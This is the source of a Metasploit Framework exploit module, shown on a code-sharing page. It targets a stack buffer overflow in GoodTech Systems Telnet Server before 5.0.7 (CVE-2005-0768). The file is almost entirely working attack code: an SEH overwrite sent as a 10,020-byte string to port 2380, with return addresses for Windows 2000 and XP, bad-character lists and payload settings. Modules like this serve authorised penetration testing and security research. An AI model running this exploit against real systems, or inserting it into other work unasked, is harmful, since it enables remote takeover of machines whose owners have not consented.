Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/telnet/goodtech_telnet.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'GoodTech Telnet Server Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in GoodTech Systems Telnet Server

19
          versions prior to 5.0.7. By sending an overly long string, an attacker can

20
          overwrite the buffer and control program execution.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => 'MC',

24
        'References' => [

25
          [ 'CVE', '2005-0768' ],

26
          [ 'OSVDB', '14806'],

27
          [ 'BID', '12815' ],

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'thread'

31
        },

32
        'Payload' => {

33
          'Space' => 400,

34
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",

35
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44"

36
        },

37
        'Platform' => 'win',

38
        'Targets' => [

39
          [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],

40
          [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],

41
        ],

42
        'Privileged' => true,

43
        'DisclosureDate' => '2005-03-15',

44
        'DefaultTarget' => 0,

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        Opt::RPORT(2380)

56
      ]

57
    )

58
  end

59


60
  def exploit

61
    connect

62


63
    sploit = rand_text_english(10020, payload_badchars)

64
    seh = generate_seh_payload(target.ret)

65


66
    sploit[10012, seh.length] = seh

67


68
    print_status("Trying target #{target.name}...")

69


70
    sock.put(sploit + "\r\n\r\n")

71


72
    handler

73
    disconnect

74
  end

75
end

76


77